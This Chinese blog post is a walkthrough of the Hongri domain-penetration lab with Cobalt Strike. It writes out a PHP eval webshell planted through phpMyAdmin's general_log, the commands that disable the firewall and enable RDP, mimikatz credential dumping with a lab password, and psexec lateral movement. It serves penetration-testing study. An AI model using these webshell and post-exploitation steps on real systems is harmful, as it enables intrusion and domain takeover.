cs与简单域渗透

2020-07-03 20:07:00
cs - 域渗透

前言

上回遇到了域渗透题,自己没事找了个红日的靶机来学学域渗透的东西。

红日的域渗透靶机,有三台机,配了两个网段:

kali  nat 
win7  vm2,nat
win2008 vm2
win2003 vm2

nat为192.168.248.0/24

vm2为192.168.52.0/24

貌似环境问题,win7的靶机需要清理右下角通知区域图标:

reg delete "HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify" /va /f
taskkill /f /im explorer.exe & start explorer.exe

陆陆续续做了好久,虚拟机也重启了几次,有些ip可能变了,本文仅供参考。

靶机后续域渗透比较简单,只是一个知识的了解。

信息收集

135为win7靶机,探测其服务:

root@zhang:~# nmap -sS 192.168.248.135
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-18 23:32 CST
Nmap scan report for 192.168.248.135
Host is up (0.00059s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:6E:05:E6 (VMware)

80端口看下,是个phpstudy探针:

拿webshell

根据如下:phpstudy探针提权

访问phpmyadmin后台root/root弱口令进入。

在探针处可以得到我们的phpstudy部署路径,到sql语句执行处写入马儿:

select "<?php @eval($_POST['hhhm']) ?>" into outfile 'C:/phpStudy/WWW/hhhm.php';

然而会发现提示不能写入:

The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

好久没遇到了,回忆一下phpmyadmin日志写shell:phpmyadmin写shell方式

show global variables like "%genera%";

会得到:

我们要做就就是把第一个改为On,第二个改为我们的shell路径。

set global general_log='on';
SET global general_log_file='C:/phpStudy/WWW/hhhm.php';
select "<?php @eval($_POST['hhhm']) ?>";
set global general_log='off';

执行语句之后就会写入我们的马儿,成功拿到webshell。

弹shell

这边mark一下,关闭防火墙的安全警报以避免在主机弹出提示:

netsh advfirewall set allprofiles state off

拿到webshell之后直接上传个exe,因为没有杀软所以很轻易就把shell弹到了cs上面。

可以看到是一个Administrator权限的shell。

主机信息收集

现在着手收集一下主机的信息,先查看一些基础的信息,我收集了一些常用的命令:

ipconfig /all    查询本机IP段,所在域等
net config Workstation    当前计算机名,全名,用户名,系统版本,工作站域,登陆域
net user    本机用户列表
net localhroup administrators    本机管理员[通常含有域用户]
net user /domain    查询域用户
net user 用户名 /domain    获取指定用户的账户信息
netstat -ano    查看开启的端口
net user /domain b404 pass    修改域内用户密码,需要管理员权限
net group /domain    查询域里面的工作组
route print     查看路由信息
netstat     查看网络服务
query user  查看最近登录信息
net group 组名 /domain    查询域中的某工作组
net group "domain admins" /domain    查询域管理员列表
net group "domain controllers" /domain    查看域控制器(如果有多台)
net time /domain    判断主域,主域服务器都做时间服务器
net accounts查看密码策略
ipconfig /all    查询本机IP段,所在域等

net view:

C:\phpStudy\WWW> net view
服务器名称            注解
-------------------------------------------------------------------------------
\\OWA                                                                          
\\ROOT-TVI862UBEH                                                              
\\STU1    

ipconfig /all:

并且从中可以看到dns服务器为192.168.52.138。

内网提权与移动

用cs的话方便很多,靶机在cs上线直接拿ms14-058能提权到system权限,net view扫扫能发现有另外两台机器(本机为STU1):

用mimikatz跑出来STU1的账号密码为:

GOD\Administrator hongrisec@2020

测试远程登录发现失败,扫一下端口会发现3389端口没有开启,使用命令开启:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

这就成功登录上目标机器,接下来考虑一下如何横向移动。

先创建一个SMB Beacon,因为先前抓取凭证的时候很容易就抓到了域管理员账号密码,所以这里直接使用psexec尝试登录,此时会发现又一台机器上线。

同理可以将域内另一台机器上线。



本文原创于HhhM的博客,转载请标明出处。



CopyRight © 2019 HhhM
Power By Django & Bootstrap
已运行
粤ICP备19064649号